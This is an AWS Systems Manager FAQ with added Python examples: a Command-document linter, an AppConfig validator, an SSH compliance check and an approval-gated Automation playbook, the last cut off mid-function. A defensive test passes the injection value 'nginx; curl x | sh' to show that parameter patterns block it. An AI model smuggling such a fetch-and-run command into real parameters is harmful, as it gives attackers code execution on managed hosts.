Q: What is AWS Systems Manager?
AWS Systems Manager allows you to centralize operational data from multiple AWS services and automate tasks across your AWS resources. You can create logical groups of resources such as applications, different layers of an application stack, or production versus development environments. With Systems Manager, you can select a resource group and view its recent API activity, resource configuration changes, related notifications, operational alerts, software inventory, and patch compliance status. You can also take action on each resource group depending on your operational needs. Systems Manager provides a central place to view and manage your AWS resources, so you can have complete visibility and control over your operations.
Q: Who should use AWS Systems Manager?
If you use multiple AWS services, AWS Systems Manager provides you with a centralized and consistent way to gather operational insights and carry out routine management tasks. You can use AWS Systems Manager to perform routine operations, track your development, test, and production environments, and proactively act on events or other operational incidents. AWS Systems Manager provides an operations complement to the more developer-focused tools you use, such as code editors and integrated development environments (IDEs). Similar to an IDE, AWS Systems Manager integrates a broad range of operations tools.
Q: How do I get started?
Getting started with AWS Systems Manager is easy. Using the AWS Management Console, navigate to the AWS Systems Manager console. You can create a resource group by using a simple tag query, then begin exploring the integrated set of operational tools that AWS Systems Manager provides.
Q: Can I privately access AWS Systems Manager APIs from my VPC without using public IP addresses?
Yes. You can privately access AWS Systems Manager APIs from your VPC (created using Amazon Virtual Private Cloud) by creating VPC endpoints. With VPC endpoints, the routing between the VPC and AWS Systems Manager is handled by the AWS network without the need for an internet gateway, NAT gateway, or VPN connection. The latest generation of VPC endpoints used by AWS Systems Manager are powered by AWS PrivateLink, a technology that enables private connectivity between AWS services using elastic network interfaces (ENIs) with private IP addresses in your VPCs. For an instance with no route to the internet, the agent needs interface endpoints for the ssm and ec2messages services, plus ssmmessages if you use Session Manager, and the endpoints' security groups must allow HTTPS (TCP 443) from the instances. To learn more about PrivateLink, visit the PrivateLink documentation.
Q: Can I still use Amazon EC2 Systems Manager through the EC2 console?
Yes. Users who are accustomed to using EC2 Systems Manager in the EC2 console will find a link to AWS Systems Manager. Amazon EC2 Systems Manager services are still easy to discover and use. AWS Systems Manager offers a new user experience for these tools.
Q: What sorts of insights can I gather through AWS Systems Manager?
AWS Systems Manager overlays information from multiple AWS services. These cross-service insights are surfaced through multiple native dashboards. AWS Systems Manager also embeds Amazon CloudWatch dashboards and lets you reuse your existing dashboards or build new ones.
Q: What are built-in insights?
AWS Systems Manager’s built-in insights are dashboards that include recent API calls through AWS CloudTrail, recent configuration changes through AWS Config, Instance software inventory listings, instance patch compliance views, and instance configuration compliance views. You can filter these account-level insights to reflect the members of a particular resource group. These dashboards also show recent event logs through AWS Personal Health Dashboard and optimization recommendations through AWS Trusted Advisor.
Q: What is a managed instance?
A managed instance is any on-premises server or Amazon EC2 instance that can be managed using AWS Systems Manager. A managed instance can be a physical server or virtual machine in your on-premises data center or even another cloud provider.
Q: How do I set up a managed instance?
You can set up an EC2 instance as a managed instance by installing the Systems Manager agent and attaching an AWS Identity and Access Management (IAM) instance profile to the instance, which gives the agent permission to call Systems Manager on the instance's behalf. The AmazonSSMManagedInstanceCore managed policy grants the minimum the agent needs; grant anything beyond that (for example, S3 access for command output) separately rather than through a broader policy. To register servers or virtual machines outside of Amazon EC2, you create an activation.
Q: Do some operating systems already include the Systems Manager agent?
The Systems Manager agent is installed by default on AWS-provided Windows AMIs and on the Amazon Linux AMI, and it is available in the Amazon Linux package repository. You can also install the agent on other supported operating systems.
Q: What are AWS Systems Manager activations?
AWS Systems Manager activations enable hybrid and cross-cloud management. Using AWS Systems Manager activations, you can register any server, whether physical or virtual, to be managed by AWS Systems Manager.
Q: How do I register an instance using AWS Systems Manager activation?
You can create an AWS Systems Manager activation from the AWS Systems Manager console or API, which returns an activation code and an activation ID. Supplying both to the agent's registration command on each server registers it with Systems Manager. Treat the activation code as a credential: anyone holding it can register a machine into your account until the activation expires or its registration limit is reached, so keep the limit and expiry as tight as the rollout allows.
Q: What are standard and advanced on-premises instance management?
You can set your on-premises instance account level settings to either standard or advanced. With standard on-premises instance management, you will be able to register up to 1,000 on-premises instances per account per Region. If you need to register more than 1,000 on-premises instances, you can change your account level setting for on-premises instances to “advanced.” This will convert all the existing instances in the account and Region from standard to advanced management. With advanced on-premises instance management, you will also be able to use Systems Manager Session Manager to interactively access your on-premises instances. Note: Having a mix of instances within an account and Region is not supported.
Q: What is an AWS Systems Manager document?
An AWS Systems Manager document enables configuration as code to manage resources at scale. An AWS Systems Manager document defines a series of actions that allows you to remotely manage instances, ensure desired state, and automate operations. An AWS Systems Manager document is cross-platform and can be used for Windows and Linux instances.
Q: Where can I use AWS Systems Manager documents?
You can use Systems Manager documents with run command, state manager, or automation features.
Q: Are there pre-defined AWS Systems Manager documents?
Yes. You can choose from a variety of pre-defined AWS Systems Manager documents that automate common tasks including collecting inventory, installing applications, joining instances to a domain, instance operations, collecting metrics, and more.
Q: How do I create my own AWS Systems Manager document?
You can author AWS Systems Manager documents in JSON or YAML that conform to the document schema, from the AWS Systems Manager console or through the APIs.
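The following is an added example, not a document shipped by AWS: a cross-platform Command document in the schemaVersion 2.2 layout described above, with one step per platform selected by a platformType precondition, and a local lint plus parameter check. The document name, the ServiceName parameter and the allowedPattern are assumptions chosen for the example; the point it makes is that a parameter spliced into a command line must be constrained, because Systems Manager substitutes it verbatim at send time.

```python
import json
import re

# Constructed Command document (schemaVersion 2.2): one step per platform,
# each guarded by a platformType precondition, so a single document can be
# sent to a mixed Linux/Windows fleet. ServiceName is spliced into a shell or
# PowerShell command line, so allowedPattern pins it to a safe character set;
# Systems Manager refuses a SendCommand whose values violate the pattern, and
# violations() below applies the same test before the call is made.
RESTART_SERVICE_DOCUMENT = {
    "schemaVersion": "2.2",
    "description": "Restart a named service on Linux or Windows (added example).",
    "parameters": {
        "ServiceName": {
            "type": "String",
            "description": "Service to restart",
            "allowedPattern": "^[A-Za-z0-9._-]{1,64}$",
        }
    },
    "mainSteps": [
        {
            "action": "aws:runShellScript",
            "name": "restartOnLinux",
            "precondition": {"StringEquals": ["platformType", "Linux"]},
            "inputs": {"runCommand": ["systemctl restart {{ ServiceName }}"]},
        },
        {
            "action": "aws:runPowerShellScript",
            "name": "restartOnWindows",
            "precondition": {"StringEquals": ["platformType", "Windows"]},
            "inputs": {"runCommand": ["Restart-Service -Name '{{ ServiceName }}'"]},
        },
    ],
}

PLACEHOLDER = re.compile(r"\{\{\s*([A-Za-z0-9_]+)\s*\}\}")


def lint_document(doc):
    """Return the problems found in a Command document (an empty list means clean)."""
    problems = []
    if doc.get("schemaVersion") != "2.2":
        problems.append("platformType preconditions require schemaVersion 2.2")
    params = doc.get("parameters", {})
    names = [step["name"] for step in doc["mainSteps"]]
    if len(names) != len(set(names)):
        problems.append("step names must be unique")
    for step in doc["mainSteps"]:
        for command in step["inputs"].get("runCommand", []):
            for ref in PLACEHOLDER.findall(command):
                if ref not in params:
                    problems.append(f"step {step['name']} references undeclared parameter {ref}")
    # A string parameter interpolated into a command line without allowedPattern
    # lets anyone permitted to call SendCommand inject arbitrary commands.
    for name, spec in params.items():
        if spec.get("type") == "String" and "allowedPattern" not in spec:
            problems.append(f"parameter {name} has no allowedPattern")
    return problems


def violations(doc, values):
    """Names of supplied parameters that are unknown or fail their allowedPattern."""
    bad = []
    for name, value in values.items():
        spec = doc["parameters"].get(name)
        pattern = spec.get("allowedPattern") if spec else None
        if spec is None or (pattern and not re.fullmatch(pattern, value)):
            bad.append(name)
    return bad


def render_document(doc):
    """The JSON body handed to CreateDocument (or `aws ssm create-document --content`)."""
    return json.dumps(doc, indent=2)


if __name__ == "__main__":
    print("lint:", lint_document(RESTART_SERVICE_DOCUMENT) or "clean")
    print("safe value:", violations(RESTART_SERVICE_DOCUMENT, {"ServiceName": "nginx"}))
    print("injection attempt:", violations(RESTART_SERVICE_DOCUMENT, {"ServiceName": "nginx; curl x | sh"}))
    print(render_document(RESTART_SERVICE_DOCUMENT))
```

The lint deliberately treats an unconstrained String parameter as a finding: whoever is allowed to send the document chooses the value, and the agent runs the resulting command line as root or SYSTEM.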
Q: What does the AWS Systems Manager SLA guarantee?
Our AWS Systems Manager SLA guarantees a Monthly Uptime Percentage of at least 99.9% for AWS Systems Manager priced features.
Q: How do I know if I qualify for a SLA Service Credit?
You are eligible for a SLA credit for AWS Systems Manager under the AWS Systems Manager SLA if an AWS Systems Manager priced feature has a Monthly Uptime Percentage of less than 99.9% during any monthly billing cycle.
For full details on all of the terms and conditions of the SLA, as well as details on how to submit a claim, please see the AWS Systems Manager SLA details page.
Q: Can I connect my ServiceNow and Jira Service Desk instances to AWS Systems Manager?
Yes. The AWS Service Management Connector for ServiceNow and Jira Service Desk (formerly the AWS Service Catalog Connector) allows ServiceNow and Jira Service Desk end users to manage and operate AWS resources natively from within those tools. Their users can execute automation playbooks through AWS Systems Manager directly from ServiceNow or Jira Service Desk by using the AWS Service Management Connector. This simplifies AWS product request actions for ServiceNow and Jira Service Desk users and provides governance and oversight over AWS products.
The AWS Service Management Connector for ServiceNow is available at no charge in the ServiceNow Store. It is generally available in all AWS Regions where AWS Service Catalog is available. For more information, please visit the documentation.
The AWS Service Management Connector for Jira Service Desk is available at no charge in the Atlassian Marketplace. It is generally available in all AWS Regions where AWS Service Catalog is available. For more information, please visit the documentation.
Q: What is AWS Systems Manager OpsCenter?
OpsCenter is a Systems Manager capability that provides a central location where operations engineers, IT professionals, and others can view, investigate, and resolve operational issues related to their environment. OpsCenter is designed to reduce mean time to resolution for impacted AWS and hybrid cloud resources. OpsCenter aggregates and standardizes operational issues, referred to as OpsItems, while providing contextually relevant data that helps with diagnosis and remediation. This information includes AWS Config changes, AWS CloudTrail logs, resource descriptions, Amazon CloudWatch alarms, related OpsItems, and related resources. You can use the public APIs to create OpsItems from any source, or use the integration with Amazon CloudWatch Events (now Amazon EventBridge). This means you can configure CloudWatch to automatically create OpsItems for any AWS service that publishes events to CloudWatch Events.
You can create the following types of OpsItems leveraging manual or automated configurations:
- Resource failures, such as an Amazon EC2 Auto Scaling group failure to launch an instance or a Systems Manager Automation execution failure
- Resource performance issues, such as a throttling event for Amazon DynamoDB or degraded Amazon EBS volume performance
- Health alerts from various AWS services, such as scheduled maintenance for an RDS DB instance or EC2 instance
- AWS Security Hub security alerts
- Resource state changes, such as an Amazon EC2 instance state change from running to stopped
- Or any other work item that needs someone’s attention
Q: What is an OpsItem?
An OpsItem is an AWS resource-related operational event that needs a user's attention and, potentially, investigation and resolution. It could be a resource-related failure, a maintenance notification, a security alert, or a performance issue. An OpsItem includes relevant information that aids investigation and resolution of the underlying event, such as impacted resources, similar past events, and recommended runbooks. High EC2 instance CPU utilization, a failed CodeDeploy deployment, or a failed Systems Manager Automation execution are examples of common OpsItems.
Q: What are the benefits of using OpsCenter?
OpsCenter enables users to reduce their mean time to resolution (MTTR) for operational issues, in some cases by over 50%. OpsCenter enables standardization and aggregation of operational issues (aka OpsItems) across various resources in a single place. Additionally, it brings together contextual information and operational tooling required to investigate and remediate issues. This reduces the time it takes engineers to navigate different tools to get relevant information. Working from a single location also minimizes the chances of manual errors, and reduces training time for newly hired engineers.
Q: Who should use OpsCenter?
Medium to large enterprises, who use multiple AWS services for their infrastructure needs, can leverage OpsCenter to manage their day-to-day operations. Additionally, Managed Service Provider (MSP) partners can also leverage OpsCenter as they manage infrastructure on behalf of other AWS customers. MSP customers can have a read-only role for better transparency into the MSP’s day-to-day operations.
Primary users of the service will be operations engineers, such as DevOps engineers and IT service desk professionals.
Q: How is OpsCenter different from a Case Management system?
OpsCenter is designed to complement your existing case management systems. You can integrate OpsCenter into your existing case management system by using public API actions. You can also maintain manual lifecycle workflows in your current systems and use OpsCenter as an investigation and remediation hub.
Q: Does OpsCenter require the use of the AWS Systems Manager Agent?
Getting started with OpsCenter doesn’t require the use of the Systems Manager Agent.
Q: What is AWS Systems Manager Explorer?
AWS Systems Manager Explorer is a customizable operations dashboard for your AWS resources. Explorer displays an aggregated view of operations data from across your AWS accounts and Regions. Explorer provides context into how operational issues are distributed across your business units or applications, how they trend over time, and how they vary by category.
Q: What is OpsData?
OpsData is operations data displayed by the Explorer dashboard. OpsData comes from a variety of sources including EC2, OpsCenter, and Patch Manager. You can view and manage OpsData sources from the Explorer settings page.
Q: How does Explorer relate to OpsCenter?
One type of data displayed by Explorer is OpsItems from OpsCenter. OpsItems help you manage, investigate, and remediate operational issues. Explorer provides an aggregated view of your OpsItems alongside other relevant operations data across accounts and Regions. OpsItems can still be managed and remediated through OpsCenter.
Q: How do I view my OpsData across accounts and Regions?
You can view your OpsData across accounts and Regions by setting up a resource data sync from the Explorer settings page. The resource data sync collects all OpsData from the accounts and Regions you have specified and aggregates it into a single view.
Q: What is the relationship between AWS Systems Manager and AWS Resource Groups?
The AWS Systems Manager console integrates with AWS Resource Groups, and it offers grouping capabilities in addition to other native integrations.
Q: Can I create resource groups through AWS Systems Manager?
You can use the AWS Systems Manager console to create your own heterogeneous resource groups by using a tag query. The group contains every AWS resource whose tags match that query. By creating your own resource groups, you can produce AWS Systems Manager views that reflect how you think about your resources. For instance, you might want to create resource groups by application component, application tier, or area of operational ownership.
Q: What are resource group insights in AWS Systems Manager?
AWS Systems Manager offers a collection of resource-group-specific insights. These insights include recent API calls through AWS CloudTrail, recent configuration changes through AWS Config, instance software inventory listings, instance patch compliance views, and instance configuration compliance views. You can filter these account level insights to reflect the members of a particular resource group.
Q: What are resource group actions in AWS Systems Manager?
AWS Systems Manager lets you execute AWS Systems Manager automation documents directly on a resource group. The members of the resource group itself will be passed to the AWS Systems Manager automation document as an input. AWS Systems Manager automation documents offer a variety of example actions, such as restarting instances in a resource group after approval or patching Amazon EC2 instances, three at a time.
Q: What is AWS AppConfig?
AWS AppConfig is a feature of AWS Systems Manager that allows you to quickly validate and roll out configurations across an application of any size, whether hosted on Amazon Elastic Compute Cloud (Amazon EC2) instances, containers, AWS Lambda functions, mobile apps, or IoT devices, in a controlled and monitored way. AWS AppConfig enables you to validate configuration data to make sure it is syntactically and semantically correct according to your definitions before deploying it to your application. AWS AppConfig allows you to follow deployment best practices by rolling out configuration at a pace that you define while monitoring for errors. In case of errors, AWS AppConfig can roll back the changes to minimize impact to the application’s users.
Q: Who should use AWS AppConfig?
AWS AppConfig is designed for System administrators, DevOps teams, and developers who want to roll out configuration changes across their applications in a managed and monitored way, similar to the way they manage code, but without the need for deploying code when a configuration value changes, thus helping to mitigate the risk of outages. AWS AppConfig is for any size or type of company or organization that has targets (hosts, servers, AWS Lambda functions, containers, mobile devices, IoT devices, etc.) for configurations.
Q: What is a Configuration?
A Configuration is a collection of one or more application settings that your application uses to modify its behavior at runtime. You can store your configurations as AWS Systems Manager Documents or Parameters.
Q: What is a Validator?
A validator is either a schema or a pointer to an AWS Lambda function that AWS AppConfig uses to enable you to test that your configuration is syntactically or semantically correct according to your definitions.
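The following is an added example of the Lambda-function kind of validator, not code from AWS AppConfig itself. AppConfig invokes the function with the candidate configuration base64-encoded in the event's `content` field and treats any exception as a rejection; the sample event, the configuration keys (featureReleaseAt, rolloutPercent, allowedOrigins) and the rules applied to them are constructed for a hypothetical application.

```python
import base64
import json
from datetime import datetime, timezone


def encode_content(config):
    """Wrap a configuration dict the way AppConfig delivers it (base64 of the raw bytes)."""
    return base64.b64encode(json.dumps(config).encode()).decode()


# Constructed example of the validator event; the IDs are placeholders.
SAMPLE_EVENT = {
    "applicationId": "app-example",
    "configurationProfileId": "profile-example",
    "configurationVersion": "3",
    "content": encode_content({
        "featureReleaseAt": "2025-01-15T09:00:00Z",
        "rolloutPercent": 25,
        "allowedOrigins": ["https://app.example.com"],
    }),
}


def validate_config(config):
    """Semantic checks for this (hypothetical) application; returns a list of violations."""
    errors = []
    if not isinstance(config, dict):
        return ["top-level value must be a JSON object"]
    try:
        datetime.strptime(config.get("featureReleaseAt"), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    except (TypeError, ValueError):
        errors.append("featureReleaseAt must be an ISO-8601 UTC timestamp")
    pct = config.get("rolloutPercent")
    if isinstance(pct, bool) or not isinstance(pct, int) or not 0 <= pct <= 100:
        errors.append("rolloutPercent must be an integer from 0 to 100")
    origins = config.get("allowedOrigins")
    if not isinstance(origins, list) or not origins:
        errors.append("allowedOrigins must be a non-empty list")
    else:
        for origin in origins:
            # Fail closed: a wildcard or plaintext origin would silently weaken the CORS policy.
            if not isinstance(origin, str) or origin == "*" or not origin.startswith("https://"):
                errors.append(f"allowedOrigins entry is not an https origin: {origin!r}")
    return errors


def lambda_handler(event, context):
    """Entry point AppConfig invokes. Raising makes AppConfig reject the configuration version."""
    raw = base64.b64decode(event["content"])
    try:
        config = json.loads(raw)
    except ValueError as exc:
        raise ValueError(f"configuration is not valid JSON: {exc}")
    errors = validate_config(config)
    if errors:
        raise ValueError("; ".join(errors))
    return {"ok": True, "version": event.get("configurationVersion")}


if __name__ == "__main__":
    print(lambda_handler(SAMPLE_EVENT, None))
```

A JSON Schema validator would catch the type and range errors above; the Lambda form is for rules a schema cannot express, such as rejecting a wildcard origin or a release date in the past.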
Q: What is a Deployment Strategy?
A Deployment Strategy is a plan for how configuration data propagates to an application. A Deployment Strategy includes controls for defining the speed at which a configuration rolls out, the percentage of application instances that should receive updated configuration at various intervals, and the amount of time AWS AppConfig should monitor the overall application to help you ensure the configuration changes did not introduce an adverse effect.
Q: How is AWS AppConfig different from AWS CodeDeploy?
An application configuration is data that influences the behavior of an application and does not require compilation; configuration is an abstraction that can change at runtime. For example, we can control a feature release by populating a configuration value to a specific date and time. If the value needs to change, say to a new date and time, an administrator can change the configuration value, with no compiling required, and the application applies the new configuration at runtime. Both application configuration and code should include safety mechanisms to prevent errors in a production environment. We recommend that you use AWS AppConfig to apply safety mechanisms when deploying new configurations and AWS CodeDeploy when deploying new code.
Q: When should I use AWS Systems Manager Parameter Store and when should I use AWS AppConfig?
AWS Systems Manager Parameter Store is a feature that offers the ability to store, retrieve and manage a secret or plain-text configuration value. Common use cases for Parameter Store include storing database strings and license codes as parameter values. If you need to store and retrieve values in a self-managed way, you should use Parameter Store. AWS AppConfig is an application configuration management service which allows you to safely release updated configuration to applications at runtime and allows you to store configurations as Parameters. If you need to model a complex set of application configurations that you can validate and deploy safely in a controlled environment, with ability to rollback changes under certain conditions, you should use AWS AppConfig.
Q: How is AWS AppConfig different from AWS Config?
AWS Config enables you to assess, audit, and evaluate the configurations of your AWS resources, while AWS AppConfig lets you manage application configuration. You should use AWS Config to get a detailed view of the configuration of AWS resources in your account and identify how the resources were configured in the past and how the configurations change over time. AWS AppConfig is meant for your applications running on AWS resources or on-premises servers. With AWS AppConfig, you can validate changes in application configuration and set deployment strategies to safely deploy updated configurations to applications at runtime.
Q: What are Amazon CloudWatch Dashboards?
With Amazon CloudWatch Dashboards, you can create reusable dashboards that allow you to monitor your AWS resources in one location. Metric data is kept for a period of fifteen months enabling you to view up-to-the-minute data and also historical data.
Q: How are Amazon CloudWatch Dashboards integrated with AWS Systems Manager?
Your existing CloudWatch Dashboards are now available directly through AWS Systems Manager. You can also create new CloudWatch Dashboards directly from Systems Manager. Using CloudWatch Dashboards, you can build your own custom operational dashboards to reflect the health of an application component, an application tier, or general areas of operational ownership.
Q: What is AWS Systems Manager inventory?
AWS Systems Manager collects information about your instances and the software installed on them, helping you to understand your system configurations and installed applications. You can collect data about applications, files, network configurations, Windows services, registries, server roles, updates, and any other system properties. The gathered data enables you to manage application assets, track licenses, monitor file integrity, discover applications not installed by a traditional installer, and more.
Q: Can I collect customized information from an Amazon EC2 instance or an on-premises instance?
Yes, you can create custom inventory types to collect additional system properties, which can be gathered by the instance itself or recorded using the API. Some examples include JSON-formatted results from PowerShell or other applications, and information statically stored in JSON files such as rack-info.
Q: How can I track changes to my configuration over time?
Using AWS Config, you can monitor an instance's compliance with a desired configuration through AWS Config rules. This capability allows security experts and compliance auditors to have a complete audit trail of instance configuration changes, as well as receive proactive notifications in the event of non-compliance.
Q: Can I view or query inventory data from across AWS accounts or Regions?
Yes, you can sync inventory data from multiple accounts and Regions to the same Amazon S3 bucket. You can then use Amazon Athena, Amazon QuickSight, or your own business intelligence (BI) tools to query inventory data across accounts and Regions.
Q: What is AWS Systems Manager configuration compliance?
AWS Systems Manager lets you scan your managed instances for patch compliance and configuration inconsistencies. You can collect and aggregate data from multiple AWS accounts and Regions, and then drill down into specific resources that aren’t compliant. By default, AWS Systems Manager displays data about patching and associations. You can also customize the service and create your own compliance types based on your requirements.
Q: Can I track changes to my configuration over time?
Using an integration with AWS Config, you can monitor an instance's compliance with a desired configuration through AWS Config rules. This capability allows security experts and compliance auditors to have a complete audit trail of instance configuration changes, as well as receive proactive notifications in the event of non-compliance.
Q: How do I view the compliance levels of my instances?
With AWS Systems Manager you can view patch compliance information, which tells you the detailed results of the patching process. You can easily get aggregate compliance details per instance. In addition, you can drill in further and for each instance you can determine which patches are installed, missing, not applicable, and which failed to install.
Q: Can I create my own compliance checks?
Yes. You can create your own compliance types that can be recorded through the API. Based on your business requirements, you can create your own checks and then record the compliance through AWS Systems Manager to track non-compliant instances. You can also view this compliance information across accounts and Regions by creating a resource data sync.
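The following is an added example, not part of the page or of any AWS sample: a custom compliance check that evaluates an instance's sshd_config against three hardening rules and produces the items that would be recorded through PutComplianceItems. The sshd_config excerpts are constructed, the instance ID and execution ID are placeholders, and no API call is made; the compliance type name Custom:SshHardening is an assumption (custom types must start with "Custom:").

```python
import re
from datetime import datetime, timezone

# Constructed sshd_config excerpts standing in for /etc/ssh/sshd_config read
# on a managed instance (no real host is contacted).
SSHD_CONFIG_HARDENED = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
X11Forwarding no
"""

SSHD_CONFIG_WEAK = """\
Port 22
PermitRootLogin yes
# PasswordAuthentication left at its default (yes)
X11Forwarding yes
"""

# item id, title, severity, directive, required value, OpenSSH default when absent
CHECKS = [
    ("ssh-1", "Root login over SSH disabled", "CRITICAL", "PermitRootLogin", "no", "prohibit-password"),
    ("ssh-2", "Password authentication disabled", "HIGH", "PasswordAuthentication", "no", "yes"),
    ("ssh-3", "X11 forwarding disabled", "LOW", "X11Forwarding", "no", "no"),
]


def directive(text, name, default):
    """Effective value of an sshd_config directive: first uncommented match wins, as sshd does."""
    for line in text.splitlines():
        m = re.match(rf"^\s*{name}\s+(\S+)", line, re.IGNORECASE)
        if m:
            return m.group(1).lower()
    return default


def evaluate(text):
    """Run the checks and return ComplianceItems in the shape PutComplianceItems expects."""
    items = []
    for item_id, title, severity, name, wanted, default in CHECKS:
        actual = directive(text, name, default)
        items.append({
            "Id": item_id,
            "Title": title,
            "Severity": severity,
            "Status": "COMPLIANT" if actual == wanted else "NON_COMPLIANT",
            # Details values must be strings
            "Details": {"Directive": name, "Expected": wanted, "Actual": actual},
        })
    return items


def compliance_request(instance_id, items, execution_id):
    """Keyword arguments for ssm.put_compliance_items(); ComplianceType must start with 'Custom:'."""
    return {
        "ResourceId": instance_id,
        "ResourceType": "ManagedInstance",
        "ComplianceType": "Custom:SshHardening",
        "ExecutionSummary": {
            "ExecutionTime": datetime.now(timezone.utc),
            "ExecutionId": execution_id,
            "ExecutionType": "Command",
        },
        "Items": items,
    }


def non_compliant_ids(items):
    return [item["Id"] for item in items if item["Status"] == "NON_COMPLIANT"]


if __name__ == "__main__":
    # On a real instance, read /etc/ssh/sshd_config into `text` and then call
    # boto3.client("ssm").put_compliance_items(**compliance_request("i-...", evaluate(text), "run-1"))
    for label, text in (("hardened", SSHD_CONFIG_HARDENED), ("weak", SSHD_CONFIG_WEAK)):
        print(label, "non-compliant:", non_compliant_ids(evaluate(text)))
```

Run it from a Command document on a schedule through State Manager and the results appear under the custom type in the compliance views, and in the cross-account view once a resource data sync is configured.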
Q: What is AWS Systems Manager automation?
AWS Systems Manager allows you to safely automate common and repetitive IT operations and management tasks across AWS resources. With Systems Manager, you can create JSON or YAML documents that specify a list of tasks, or use community-published documents. These documents can be executed directly through the AWS Management Console, CLIs, and SDKs, scheduled in a maintenance window, or triggered based on changes to AWS resources through Amazon CloudWatch Events. You can track the execution of each step in the documents as well as require approvals for each step. You can also incrementally roll out changes and automatically halt when errors occur.
Q: What tasks can I automate?
You can automate any task that involves interaction with AWS and on-premises resources. Built-in action types let you easily interact with Amazon EC2 instances, AWS CloudFormation stacks, and more. Action types are available to invoke AWS Systems Manager run command, Python and PowerShell scripts, and AWS Lambda functions.
Q: Are there predefined AWS Systems Manager automation playbooks?
There are over 75 predefined AWS Systems Manager automation playbooks that you can click and execute to accomplish a wide range of tasks such as baking golden AMIs, patching Amazon EC2 instances, managing instance states, and more.
Q: Can I create my own AWS Systems Manager automation playbooks?
You can customize existing AWS Systems Manager automation playbooks or create your own using JSON or YAML. You can also use AWS Systems Manager automation playbooks shared by another account and share your playbooks with others. You can use the builder experience in the console to create your playbook. With this builder, you can focus on defining the business logic of your playbooks without having to worry about the YAML/JSON document syntax: you choose from the library of actions and add inputs and outputs to assemble the playbook.
Q: Can AWS Systems Manager automation help with the approval process?
Yes. Built-in approval action types can be included in your AWS Systems Manager automation playbooks. The approvers can be one or more AWS Identity and Access Management (IAM) users or roles. AWS Systems Manager automation playbook execution waits until the minimum number of required approvals has been received, or until an approver denies, and proceeds accordingly.
Q: Can I execute AWS Systems Manager automation playbooks against an entire resource group?
Yes. You can target resource groups and execute AWS Systems Manager automation playbooks against specific resource types. You can also specify safety controls to indicate the number of resources in the group that should be simultaneously executed against, and you can add error thresholds that will stop AWS Systems Manager automation playbook execution.
Q: Can I execute AWS Systems Manager automation playbook steps one at a time?
Yes. You can choose to execute the entire AWS Systems Manager automation playbook at once or choose the manual execution mode to execute one step at a time.
Q: Can I trigger AWS Systems Manager automation playbook execution on a schedule or based on other events?
Yes. You can schedule AWS Systems Manager automation playbook execution to be triggered as an Amazon CloudWatch Events target, or you can use AWS Systems Manager maintenance windows or AWS Systems Manager state manager to trigger AWS Systems Manager automation playbook execution on a schedule. You can also trigger AWS Systems Manager automation playbook execution based on changes to AWS resources through Amazon CloudWatch Events.
Q: How does a user specify a script in an Automation playbook?
There are two methods by which you can execute a script in Automation. You can include the script inline as a step in a playbook. Alternatively, you can add scripts as attachments to a playbook and execute them by reference from a playbook step.
Q: Do Automation playbooks support multiple scripts?
Yes. You can attach multiple scripts to an Automation playbook and reference a script from a step. Scripts can be uploaded to a playbook as files or as a folder. Script dependencies (scripts calling other scripts) are also supported as long as the scripts are all part of the same playbook. Other artifacts required for the scripts to run, such as CloudFormation or Serverless Application Model (SAM) templates, can be attached to the playbooks.
Q: What script languages are supported by Automation for the script step? What environments are pre-loaded based on the script language?
Automation supports PowerShell Core and Python 3 for script steps. The Python environment is preloaded with Boto3 (the AWS SDK for Python), so scripts can call AWS APIs without packaging dependencies.
Q: What are the requirements of the script for a script step?
Automation supports inputs to be specified for a playbook. The parameters required by the scripts can be collected as Automation playbook input parameters, output from a previous step, or collected during runtime from other sources such as databases. Script output is available for consumption by the subsequent steps as a JSON object. Existing Automation features like referencing step output, Automation variables, Systems Manager Parameter Store parameters can be used to pass outputs for consumption in the playbook.
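The following is an added example, not an AWS-provided playbook: an Automation document in the schemaVersion 0.3 layout that gates an instance restart behind an aws:approve step, then records the restart from an inline aws:executeScript step, together with the arguments that fan it out over a resource group with rate control. The document name, role and approver ARNs, account ID and tag key are placeholders, and the lint rules reflect one reviewer's expectations rather than service requirements.

```python
import json
import re

# Constructed Automation document (schemaVersion 0.3). The inline script runs
# in the Automation service with the preloaded boto3, not on the instance.
RESTART_WITH_APPROVAL = {
    "schemaVersion": "0.3",
    "description": "Restart an EC2 instance after a human approves (added example).",
    "assumeRole": "{{ AutomationAssumeRole }}",
    "parameters": {
        "InstanceId": {"type": "String", "allowedPattern": "^i-[0-9a-f]{8,17}$"},
        "AutomationAssumeRole": {"type": "String", "default": ""},
        "Approver": {"type": "String", "default": "arn:aws:iam::123456789012:role/ChangeApprover"},
    },
    "mainSteps": [
        {
            "name": "waitForApproval",
            "action": "aws:approve",
            "timeoutSeconds": 3600,
            "onFailure": "Abort",
            "inputs": {
                "Approvers": ["{{ Approver }}"],
                "MinRequiredApprovals": 1,
                "Message": "Approve restart of {{ InstanceId }}",
            },
        },
        {
            "name": "stopInstance",
            "action": "aws:changeInstanceState",
            "inputs": {"InstanceIds": ["{{ InstanceId }}"], "DesiredState": "stopped"},
        },
        {
            "name": "startInstance",
            "action": "aws:changeInstanceState",
            "inputs": {"InstanceIds": ["{{ InstanceId }}"], "DesiredState": "running"},
        },
        {
            "name": "recordRestart",
            "action": "aws:executeScript",
            "inputs": {
                "Runtime": "python3.8",
                "Handler": "script_handler",
                "InputPayload": {"instanceId": "{{ InstanceId }}"},
                "Script": (
                    "def script_handler(events, context):\n"
                    "    import boto3\n"
                    "    ec2 = boto3.client('ec2')\n"
                    "    ec2.create_tags(Resources=[events['instanceId']],\n"
                    "                    Tags=[{'Key': 'LastRestartedBy', 'Value': 'ssm-automation'}])\n"
                    "    return {'tagged': events['instanceId']}\n"
                ),
            },
            "outputs": [{"Name": "tagged", "Selector": "$.Payload.tagged", "Type": "String"}],
        },
    ],
}

PLACEHOLDER = re.compile(r"\{\{\s*([A-Za-z0-9_]+)\s*\}\}")


def lint_playbook(doc):
    """Reviewer checks for an Automation document; returns a list of findings (empty = clean)."""
    findings = []
    declared = set(doc.get("parameters", {}))
    for ref in sorted(set(PLACEHOLDER.findall(json.dumps(doc)))):
        if ref not in declared:
            findings.append(f"undeclared parameter {ref}")
    if not doc.get("assumeRole"):
        # Without assumeRole the playbook runs with the permissions of whoever started it.
        findings.append("no assumeRole: execution uses the caller's own permissions")
    actions = [step["action"] for step in doc["mainSteps"]]
    if "aws:approve" in actions and actions.index("aws:approve") != 0:
        findings.append("approval step should come first so that it gates every change")
    for step in doc["mainSteps"]:
        if step["action"] == "aws:approve":
            inputs = step["inputs"]
            if inputs["MinRequiredApprovals"] > len(inputs["Approvers"]):
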